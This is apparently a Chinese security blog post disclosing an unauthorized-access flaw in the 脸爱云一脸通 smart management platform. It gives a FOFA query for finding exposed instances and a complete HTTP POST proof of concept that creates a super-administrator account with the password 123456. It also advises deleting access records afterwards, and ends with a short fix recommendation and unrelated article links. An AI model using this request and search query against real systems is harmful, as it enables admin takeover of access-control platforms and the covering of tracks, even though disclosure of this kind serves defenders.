脸爱云一脸通智慧管理平台未授权访问

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

一、漏洞概述

脸爱云一脸通智慧管理平台存在严重漏洞,允许攻击者通过未经授权的访问,在系统中任意添加用户。攻击者可滥用此漏洞创建虚假账户,提升权限,或执行其他危险操作。成功利用漏洞可能导致未经授权的系统访问,危及用户隐私和整体系统安全。

二、fofa

title=="欢迎使用脸爱云 一脸通智慧管理平台"

三、漏洞复现

poc

html 复制代码
POST /SystemMng.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=whnrkuaqbz0lyv1fbwtzf23y
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

operatorName=test&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

抓包,重放

然后就会创建一个账号为test,密码为123456的超级管理员。

登录

最后记得删除访问记录,不要对别人造成任何影响

四、修复意见

为确保系统安全,强烈建议立即修复漏洞,加强用户添加功能的输入验证和访问控制,以限制仅授权用户能够执行此操作。

相关推荐
介一安全5 小时前
【Frida Android】实战篇3:基于 OkHttp 库的 Hook 抓包
android·okhttp·网络安全·frida
信创天地9 小时前
RISC-V 2025年在国内的发展趋势
python·网络安全·系统架构·系统安全·运维开发
北京耐用通信11 小时前
冶金车间“迷雾”重重?耐达讯自动化Profibus转光纤为HMI点亮“透视眼”!
人工智能·物联网·网络协议·网络安全·自动化
unable code11 小时前
攻防世界-Misc-can_has_stdio?
网络安全·ctf·misc·1024程序员节
m0_7381207211 小时前
内网横向靶场——记录一次横向渗透(三)
开发语言·网络·安全·web安全·网络安全·php
Jerry25050913 小时前
微信小程序必要要安装SSL证书吗?小程序SSL详解
网络·网络协议·网络安全·微信小程序·小程序·https·ssl
jenchoi41320 小时前
【2025-11-07】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
墨倾许1 天前
《Windows 11 + Docker:极简DVWA靶场搭建全记录》—— 附详细排错指南与最终解决方案
windows·笔记·网络安全·docker·容器·靶场
芯盾时代1 天前
中国发行稳定币对金融行业网络安全布局的影响及新的业务增长点分析
安全·网络安全·金融
Pure_White_Sword1 天前
Bugku-Web题目-文件包含
web安全·网络安全·ctf·文件包含